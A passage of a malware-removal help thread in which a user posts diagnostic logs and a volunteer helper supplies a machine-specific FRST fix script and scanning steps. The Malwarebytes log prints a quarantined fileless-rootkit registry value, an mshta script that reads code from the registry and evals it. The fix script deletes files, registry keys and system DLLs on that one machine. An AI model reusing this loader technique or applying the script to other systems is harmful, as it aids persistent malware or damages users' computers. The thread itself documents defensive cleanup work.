The value "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" of attribute "version" in element "assemblyIdentity" is invalid.

Error: (04/04/2017 06:25:44 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "c:\program files (x86)\eset\eset online scanner\ESETSmartInstaller.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (04/04/2017 06:20:08 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

System errors:
=============
Error: (04/08/2017 12:45:46 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {F9717507-6651-4EDB-BFF7-AE615179BCCF} did not register with DCOM within the required timeout.

Error: (04/08/2017 10:30:16 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:30:16 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:28:06 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:28:06 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:26:01 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:26:01 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:23:57 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:23:57 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.

Error: (04/08/2017 10:21:53 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 70. The internal error state is 105.


Edited by krtate, 08 April 2017 - 03:36 PM.


#4 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 08 April 2017 - 03:38 PM

CodeIntegrity:
===================================
  Date: 2012-08-15 20:12:34.270
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2012-08-15 20:12:34.192
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2011-02-27 19:01:15.791
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\KEKLR\AppData\Local\Temp\OnlineScanner\Anti-Virus\fsgk.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2011-02-27 19:01:15.775
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\KEKLR\AppData\Local\Temp\OnlineScanner\Anti-Virus\fsgk.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU T6600 @ 2.20GHz
Percentage of memory in use: 73%
Total physical RAM: 3999.19 MB
Available physical RAM: 1043.05 MB
Total Virtual: 7996.56 MB
Available Virtual: 4584.46 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:285.17 GB) (Free:191.61 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:12.72 GB) (Free:2.12 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive g: () (Removable) (Total:3.72 GB) (Free:3.46 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 2169E425)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=285.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=12.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 3.7 GB) (Disk ID: 00000000)

Partition: GPT.

==================== End of Addition.txt ============================

 

 

I tried to run F-Secure, wouldn't work.

I tried Bit-Defender, but would have to uninstall my current anti-virus - didn't do this one

I have yet to try ESET, 

I ran House Call earlier, didn't find anything and didn't save log. Running again for a log. 

Ran Microsoft security and found nothing.

 

 

 

 

MBAM LOG

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 4/8/2017
Scan Time: 12:53 PM
Logfile: malwarebytes scan 4.8.2017 rootkit.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2017.04.08.03
Rootkit Database: v2017.04.02.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: KEKLR

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 342188
Time Elapsed: 48 min, 45 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Warn
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\09500508\SHELL\OPEN\COMMAND, Quarantined, [168d47a7c8e0b77f5b68314132cfde22],

Registry Values: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\09500508\SHELL\OPEN\COMMAND, mshta "about:<script>nFU1AT="NofG";s89d=new ActiveXObject("WScript.Shell");Rux3RNO="R";ugj14T=s89d.RegRead("HKCU\\software\\qyhgeurf\\hfuzav");ph4q5e="X7";eval(ugj14T);L4tdD="gvB";</script>", Quarantined, [168d47a7c8e0b77f5b68314132cfde22]

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


Edited by Rocket Grannie, 08 April 2017 - 05:58 PM.


#5 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 08 April 2017 - 08:09 PM

Hello krtate and welcome to SpywareInfo Forum.
I'm Android 8888 and I'll be helping you. Please ask questions if anything is unclear.


Please right-click on Start > Control Panel > Programs and Features and remove the following program (in bold):
Coupon Printer for Windows


NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system.

Press the Windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK button.
Please copy the entire contents of the code box below. To do this highlight the contents of the box and right click on it and select Copy.
Paste this into the open Notepad.
 

Start
CreateRestorePoint:
CloseProcesses:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U4 eabfiltr; no ImagePath
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
ZeroAccess:
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}
2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe
C:\Windows\System32\igdumd32.dll
C:\Windows\System32\igdumdx32.dll
C:\Windows\System32\MFC71.DLL
C:\Windows\System32\MFC71U.DLL
C:\Windows\System32\MSVBVM60.DLL
C:\Windows\System32\MSVCP71.dll
C:\Windows\System32\MSVCR71.dll
C:\Windows\System32\olepro32.DLL
Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca
End

Save the file as fixlist.txt in to the same folder as FRST64.
Right-click the FRST64 icon and select Run as administrator to run the tool.
Click the Fix button only once and wait.
When finished FRST will generate a log on the Desktop (fixlog.txt). Please post it to your reply.

NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.


I can see that Malwarebytes did not removed the threats it found.
 

  • Open Malwarebytes;
  • On the left pane select Settings;
  • Select the Protection tab;
  • Scroll down to Scan Options and ensure Scan for Rootkits is on and leave all other settings to default.
  • Go back to DashBoard and select the blue Scan Now tab; Note: The scan may take some time to finish, so please be patient.
  • When the scan completes if potential threats are detected, ensure to checkmark all the listed items, and click the Quarantine Selectedbutton.
  • While still on the Scan tab, click the View Report button, and in the window that opens click the Export button, select Text file (*.txt), give it a name and save it to your Desktop.
  • The log can also be viewed by clicking the log to select it, then clicking the View Report button.
  • Please copy and paste the log in your next reply.

 

 

Please download RogueKiller 32/64 Bits Installer (setup.exe) by Tigzy and save it to your Desktop.

  • Right click on the file setup.exe and select Run as administrator to install the tool.
  • Click Yes to accept any security warnings that may appear.
  • Choose the installation language and click OK.
  • Checkmark "Install 32 and 64 bits versions" and click Next. Follow the steps to install the tool.
  • Now close all programs and browsers.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • Right-click on the RogueKiller icon and select Run as administrator.
  • Click Yes to accept any security warnings that may appear.
  • Click the Scan tab and then click the Start Scan button.
  • Wait until the scan has finished. This may take some time consuming.
  • Once finished click on Open Report. It will open a new window.
  • Click Export TXT to export the report as a text file, give a name to the file such as Rklog.txt and save it to your Desktop.
  • Close RogueKiller.

Please copy and paste the contents of Rklog.txt to your next reply.

 

 

In your next reply please post:
The fixlog.txt produced by FRST;
The Malwarebytes log;

The Rklog.txt log.

Let me see those logs and tell me how is the computer running at this point.

 

Thank you.

 

Android 8888

 


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#6 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 09 April 2017 - 07:15 AM

Thank you, I left clicked on "Start", Control Panel, Uninstall Program and removed the coupon printer program. The right click option doesn't work.

 

I will continue with your instructions later today.

 

I couldn't find a folder FRST64 on my desktop. Should I go through the instructions again and save to desktop and run again?

 

Scan from EEST which took 14 hours to run;

C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll a variant of Win32/Adware.Coupons.AA application 
C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll a variant of Win32/Adware.Coupons.AA application 
C:\Windows\CouponPrinter.ocx a variant of Win32/Adware.Coupons.AA application 
 


Edited by krtate, 09 April 2017 - 08:20 AM.


#7 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 09 April 2017 - 02:41 PM

Hello krtate.
 

Thank you, I left clicked on "Start", Control Panel, Uninstall Program and removed the coupon printer program. The right click option doesn't work.

I appologize, it was my mistake. You did well! :good:

 

couldn't find a folder FRST64 on my desktop. Should I go through the instructions again and save to desktop and run again?

 

Okay, please proceed with the following instructions in the order listed and ask questions if anything is unclear.
 

 

Move the FRST64 executable file saved in the Downloads folder (C:\Users\KEKLR\Downloads) to the computer's Desktop.

Then press the Windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK button.
Please copy the entire contents of the code box below. To do this highlight the contents of the box and right click on it and select Copy.
Paste this into the open Notepad.

 

Start
CreateRestorePoint:
CloseProcesses:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Policies\Explorer: [NoSaveSettings] 00000000
HKU\S-1-5-18\...\Policies\system: [WallpaperStyle] 2**
Startup: C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b2f065a6.lnk [2017-04-08]
ShortcutTarget: b2f065a6.lnk -> C:\Users\KEKLR\AppData\Local\b3751cf7\cde8b52d.bf14bf089 ()
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U4 eabfiltr; no ImagePath
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
ZeroAccess:
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}
2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe
C:\Windows\System32\igdumd32.dll
C:\Windows\System32\igdumdx32.dll
C:\Windows\System32\MFC71.DLL
C:\Windows\System32\MFC71U.DLL
C:\Windows\System32\MSVBVM60.DLL
C:\Windows\System32\MSVCP71.dll
C:\Windows\System32\MSVCR71.dll
C:\Windows\System32\olepro32.DLL
Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca
End

 

Give the name fixlist to the file and save it in the same folder where FRST64 executable is placed which is the computer's Desktop.
Now, right-click the FRST64 icon and select Run as administrator to start the tool.
Click the Fix button only once and wait.
When finished FRST will generate a log on the Desktop named fixlog.txt. Please post its entire content in your next reply.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.


Next,

Please download Malwarebytes Anti-Rootkit BETA and save it to your computer's Desktop.

  • Right-click on the icon and select Run as administrator to start the extraction of the program;
  • Click Yes to accept the User Account Control security warning that may appear;
